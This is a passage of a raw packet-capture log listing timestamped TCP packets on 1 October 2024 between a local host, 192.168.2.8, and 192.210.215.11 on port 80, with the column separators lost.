                          Oct 1, 2024 07:38:14.897171974 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897177935 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897192001 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897197008 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897217035 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897222042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897239923 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897248030 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897255898 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897264957 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897279978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897283077 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897294998 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897301912 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897304058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897310972 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897317886 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897325993 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897391081 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897392035 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897406101 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897422075 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897445917 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897454023 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897454023 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897471905 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897475958 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897485971 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897502899 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897505999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897505999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897519112 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897542953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897548914 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897548914 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897556067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897557974 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897573948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897584915 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897588015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897598982 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897604942 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897640944 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897640944 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897651911 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897701979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897715092 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897737980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897748947 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897753954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897768021 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897783041 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897795916 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897799015 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897814989 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897830963 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897838116 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897846937 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897861958 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897876978 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897892952 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897896051 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897902012 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897912979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897928953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897938013 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897944927 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897953033 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897959948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897974968 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.897978067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897996902 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.897996902 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898015022 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898025036 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898030043 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898045063 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898052931 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898060083 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898075104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898094893 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898113966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898150921 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898165941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898180962 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898190022 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898196936 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898212910 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898214102 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898232937 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898241997 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898257017 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898282051 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898417950 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898432970 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898447990 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898463011 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898464918 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898474932 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898478985 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898492098 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898497105 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898508072 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898515940 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898523092 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898538113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898540020 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898561001 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898566961 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898577929 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898591995 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898592949 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898607969 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898612976 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898622036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898638010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898641109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898667097 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898679018 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898686886 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898694992 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898710012 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898724079 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898725033 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898732901 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898741961 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898753881 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898760080 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.898772001 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898787975 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.898807049 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940452099 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940479040 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940495014 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940562010 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940572977 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940587997 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940598011 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940603971 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940618992 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940633059 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.940649986 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.940673113 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985284090 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985312939 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985328913 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985343933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985368013 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985383987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985399008 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985421896 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985436916 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985462904 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985477924 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985491991 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985507965 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985522985 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985538960 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985553980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985558987 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985569954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985583067 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985585928 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985596895 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985596895 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985605955 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985614061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985637903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985640049 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985649109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985661983 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985677004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985691071 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985692024 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985707045 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985718966 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985729933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985744953 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985743046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985743046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985760927 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985778093 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985778093 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985795021 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985800982 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985806942 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985814095 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985819101 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985841990 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985846996 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985857010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985868931 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985872030 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985882998 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985888004 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985905886 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985910892 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985913038 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985918999 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985924959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985940933 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985955954 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985960960 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.985979080 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985992908 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.985996962 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986010075 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986015081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986026049 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986041069 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986049891 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986063957 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986066103 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986082077 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986092091 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986097097 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986114025 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986124039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986124039 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986141920 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986157894 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986165047 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986179113 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986195087 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986205101 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986208916 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986224890 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986234903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986234903 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986243010 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986255884 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986265898 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986284971 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986331940 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986346960 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986361980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986371994 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986375093 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986391068 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986394882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986407042 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986418962 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986423016 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986438036 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986438990 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986454964 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986464977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986470938 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986485958 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986488104 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986515045 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986540079 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986541033 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986562967 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986578941 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986581087 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986593008 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986608028 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986618042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986618042 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986623049 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986632109 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986638069 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986653090 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986654997 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986670017 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986670971 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986685991 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986690044 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986715078 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986720085 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986736059 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986736059 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986752987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986764908 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986782074 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986787081 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986856937 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986874104 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986888885 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986903906 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986911058 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986918926 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986932993 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986933947 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986948967 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986959934 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986963987 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986979961 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986991882 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.986994982 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.986999989 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987010002 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987026930 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987046003 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987097979 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987119913 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987137079 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987143993 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987152100 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987166882 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987169027 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987180948 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987184048 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987195969 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987201929 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987211943 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987231970 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987246037 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987339973 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987354994 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987369061 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987390041 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987394094 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987397909 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987410069 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987421989 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987426043 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987437010 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987442970 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987447977 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987458944 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987469912 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987473965 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987488985 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987503052 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987503052 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987504959 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:14.987519979 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987534046 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:14.987567902 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.029395103 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.029429913 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.029479980 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.029503107 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.029511929 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.029524088 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.029531002 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.029548883 CEST8049704192.210.215.11192.168.2.8
                          Oct 1, 2024 07:38:15.029561043 CEST4970480192.168.2.8192.210.215.11
                          Oct 1, 2024 07:38:15.029593945 CEST4970480192.168.2.8192.210.215.11
